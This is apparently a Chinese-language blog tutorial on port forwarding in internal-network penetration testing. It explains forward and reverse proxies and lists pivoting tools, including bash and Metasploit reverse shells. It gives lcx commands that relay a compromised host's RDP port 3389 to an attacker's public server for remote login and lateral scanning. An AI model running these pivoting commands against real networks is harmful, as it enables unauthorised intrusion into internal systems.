内网端口转发在内网渗透中是经常用到的东西。
端口转发是啥
端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为,其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址(局域网内部)上的一个端口。
简单理解,就外网访问内网,内网用端口转发就可以了。
为什要这么做呢?
因为方便啊,哈哈。转发后,直接在本地操作内网机器,多方便呀。
首先要理解正向代理和反向代理的意思。
A——B——C
A对C的请求,B作为代理,代替A去访问C,并将结果返回给A,则B是正向代理
B主动与A的8888端口建立连接,并将A:8888的访问转为对C:80的访问,结果返回给A,则B是反向代理
反向代理的好处:当AB之间有防火墙,不允许A连B,但是允许B连A
用到的工具
lcx,nx,scoks代理,bash反弹,msf后门反弹,frp
lcx端口转发
前提是在端口转发的时候需要一台公网服务器,lcx是一款轻便的端口转发工具,Lcx程序多用于被控制计算机处于内网的时候,被控制机可能中了木马程序,虽然能够进行控制,但还是没有使用远程终端登录到本机进行管理方便,因此在很多情况下,都会想方设法在被控制计算机上开启3389端口,然后通过lcx等进行端口转发,进而在本地连接到被控制计算机的远程终端并进行管理和使用。在没有端口转发的情况下外网主机是不能直接连接内网主机的,但是lcx工具可以将内网主机(出入内网主机的需要能够ping通互联网)的某个端口抓发到外网的某个端口上面,这样的话处于外网的主机可以将映射到外网的端口再反弹到另一个外网的端口上面(用的最多的是3389),这样我们就可以直接远程连接反弹的端口就可以与内网主机进行通信。故内网已经打通,说实话lcx的工具如同在路由器上面做了端口转发。
在被控制端执行命令:lcx.exe -slave 192.168.205.1 53 192.168.205.143 3389 //将内网3389端口转发到公网53端口;
在控制端执行命令:lcx.exe -tran 53 1234 //将接收到的53端口反弹到1234端口;
执行完毕后,我们会发现内网的3389已经反弹到公网53端口:
我们本地远程连接192.168.205.1:1234,就可以访问到内网主机,这样我们就可以远程登陆内网服务器,进行内网的横向扫描(请勿非法使用)
相关工具的使用,打击可以看这里:
https://www.freebuf.com/articles/network/210653.html
https://www.freebuf.com/articles/web/170970.html
https://www.jianshu.com/p/735e8f1746f0